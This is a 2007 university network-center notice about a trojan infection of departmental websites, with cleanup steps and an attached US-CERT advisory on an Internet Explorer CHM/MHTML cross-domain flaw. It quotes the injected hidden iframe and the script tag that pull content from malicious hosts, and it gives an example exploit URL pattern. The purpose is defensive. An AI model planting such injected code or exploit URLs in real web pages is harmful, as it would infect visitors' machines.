大医首页 | 本站首页 | 站点地图
今天是: 2017年9月26日 星期二 本站搜索
 
 
技术服务 共享资源 规章制度 部门概况
 
网络运维中心 | 一卡通技术中心 | 电化教育中心 | 研发中心 | 计算机实验室 | 计算机教研室 | 综合管理室
快速链接
  新闻速递
  通知公告
  常用下载
  技术小贴士
  支部生活
  快速返回

本站位置: 通知公告

浏览文章 【发布时间: 2007-3-2】  【点击数: 632】 【字号: 】 【我要打印

关于督促二级网站单位进行网络安全自查的通知

近日,学校Home服务器再次遭遇木马病毒,据校园网用户反映,登陆二级网站首页,访问速度很慢,同时在客户端装有防病毒软件的时候,可以发现该网页包含木马病毒 Hack.Exploit.HTML.Agent.w等。

经过网络中心工作人员查证,这次病毒泛滥感染是某二级网络用户自行上传的文件中含有病毒。为此,网络中心这里郑重提出建议和要求,要求所有二级网站单位在新学期开始之际,要对本单位的网站安全做一次全面细致的自查工作。

安全自查工作包含两个内容,一是内容安全性。有BBS和留言簿、论坛等交互内容的单位尤其要注意其内容安全性,要及时删除不适当内容。二是网站本身的技术安全性。这里包括帐号安全管理,网站内容上传前要保证其不含病毒、木马安全可靠,以及网站本身代码透明公开不留后门等等。网络中心将不定期进行抽查,网站内容安全不过关,长时间不能解决实际问题的,将在报告上级部门后,收回自行维护权限直至进行暂停开放等处理。

这里简单介绍一下这次问题的处理办法。本次病毒的本体已经在服务器端杀灭,不过该病毒在首页文件上嵌入了一段代码,这个看似正常编写的HTML代码的实际意义是指向了一个含有病毒的非法网站。我们访问这些页面的时候,就会自动的链接上这个非法网站,感染本机。被感染的文件包括所有目录下的index.htm,default.asp,index.asp以及在首页上通过文件引用方法显示的top.asp,foot.asp等文件。用记事本或专业的主页编辑软件打开这些网页文件,可在文件最后发现如下代码:

<iframe src="http://www.yxgm78.com/yx.htm" width=0 height=0></iframe>
<script language="javascript" src="http://webbest.808.nuno.cn/mm.js"></script>

针对病毒特点,我们有两个办法可以处理,一是彻查所有可能感染的文件源代码,发现以上非法代码即进行删除;二,我们也可以直接把备份的主页文件重新上传覆盖。同时,对连接学校服务器的机器进行认真杀毒和木马检查,及时升级防病毒软件和防火墙。

网络中心已在服务器上尽可能细致的做了一次检查,如部分二级单位仍不能解决或者没有自行上传权限,请联系网络中心进行处理。

现代教育技术部
2007-03-02

附:相关专业文章

★Bloodhound.Exploit.6病毒专题★

一、安全公告编号
US-CERT:TA04-099A

二、影响范围

运行Internet Explorer的 Microsoft Windows 系统

三、漏洞描述

ITS 协议处理机制中存在一个交叉域脚本漏洞,ITS协议处理机制决定了存储在一个已编译HTML帮助 (CHM)文件中HTML组件的安全域。HTML帮助系统"……运用Microsoft Internet Explorer下列组件显示帮助内容。他支持HTML, ActiveX, Java,和脚本语言(JScript, 和Microsoft Visual Basic Scripting Edition)。"CHM文件运用InfoTech Storage (ITS)格式存储HTML 文件, graphic 文件, 和ActiveX 对象这一类的组件。IE提供多种协议处理程序,能够访问ITS文件和单独的CHM组件:its:, ms-its:, ms-itss:,以及mk:@MSITStore:。IE也有访问部分运用mhtml:协议处理机制的MIME封装的HTML集合文件包(MHTML)的能力。
当IE引用一个使用ITS和mhtml:协议的不可访问或是不存在的MHTML文件时,ITS协议处理机制能够通过一个替代资源访问到CHM文件。IE错误地将CHM文件看作和不可使用的MHTML文件在同一个域中。运用特殊处理的URL,攻击者能够导致CHM文件中的任意脚本在不同域中执行,这与交叉域的安全模式相违背。
任何使用WebBrowser ActiveX 控件或是IE HTML 翻译机制 (MSHTML)的程序会受到此漏洞影响。例如Internet Explorer, Outlook, 和 Outlook Express 都是此类程序。任何程序,包括其他网络浏览器,使用这个IE协议处理机制(URL名字)的都可以被攻击。同样,由于IE决定MIME类型,HTML和CHM文件不会有预期的文件扩展名(.htm/.html/.chm )。
注意:
使用替代的网络浏览器不会减轻此漏洞的危害。使用与Windows 系统中调用IE来处理ITS协议URLs机制不同的其他网络浏览器也许可以避免这个漏洞。

四、危害描述

通过诱导受害者去浏览一个HTML文档例如网页或者HTML的邮件信息,攻击者能在包含攻击文档的域以外的域中运行脚本。通过在Local Machine域中运行脚本,攻击者能够利用运行IE的用户的权限执行任意代码。攻击者也可以读取或更改其他网站数据(包括读取cookies 或内容以及更改或者创建内容)。
现已存在针对此漏洞的攻击代码。US-CERT已经监测到的安全事件表明这个漏洞已经被利用。Ibiza trojan, W32/Bugbear的变种和BloodHound.Exploit.6 是利用此漏洞的恶意代码中的一些例子。值得注意的是任意执行的恶意代码经此漏洞传递,不同的防病毒厂商能够以不同的名称识别这些恶意代码。
一个恶意网址或邮件信息可能包含类似如下内容的HTML:ms_its:mhtml:file://C:\nosuchfile_mht!http://www.example.com//exploit_chm::exploit_html
(此 URL故意进行了修正避免防病毒软件的检测)
在这个例子中,HTML和exploit.html中的脚本将会在Local Machine 域的安全上下文中执行。exploit.html通常会包含或者下载一个可运行的净荷,例如,后门、特洛伊木马、病毒或其他恶意代码。
注意,通过加密URL可能绕过HTTP内容检查或防病毒软件。

五、解决方案

现在没有针对这个漏洞的完整解决方案。在补丁发布之前,可以参照下面的列表内容来预防。

  1. 关闭ITS协议处理
    关闭ITS协议处理程序目的在于避免该漏洞被利用。删除或修改下面的注册键名称: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its,ms-itss,its,mk}
    关闭这些协议处理程序将明显的减少Windows帮助系统的功能,并且可能导致其它的意外结果。在相关补丁测试并安装之后,应该撤消这些修改。
  2. 遵循好的互联网安全惯例。
    这些推荐的安全措施将帮助减少被攻击的可能和减轻交叉域漏洞的影响。
  3. 关闭活动脚本和ActiveX控件
    注意: 关闭活动脚本和ActiveX控件可能不会阻止该漏洞被利用。
    在Local Machine域中关闭活动脚本和ActiveX控件可以停止一些类型的攻击和阻止利用不同的交叉域漏洞。在任何用来阅读HTML邮件的域中关闭活动脚本和ActiveX控件。
    在Local Machine域中关闭活动脚本和ActiveX控件可以阻止某些利用活动脚本和ActiveX控件的恶意代码的运行。改变这些设置可能会减少脚本,Applet,Windows组件或者其他应用程序的功能。请参阅微软知识库833633号文章了解Local Machine Zone 安全设置的具体信息。注意在Windows XP SP2中包括了这个改变。
  4. 不要使用未确定的链接
    不要点击在邮件,即时信息,web论坛或者IRC频道中的不确URL.。
  5. 维护升级防病毒软件
    升级病毒定义库后的防病毒软件可以识别和阻止一些攻击企图。各种各样的刺探和攻击不可能完全被侦测到。不要指望单单依赖防病毒软件就可以防止该漏洞。更多的病毒及反病毒软件信息可以从http://www.us-cert.gov/other_sources/viruses.html网站获得

编辑:刘婉婧 作者:现代教育技术部 最后更新:2012-5-9 21:38:28

Copyright (C) Since 2006
Modern Educational Technology Center, DMU
Designed by Network Center. Total Visits: 1017132

地址:大连市旅顺南路西段9号
邮编:116044
Email:met@dmu.edu.cn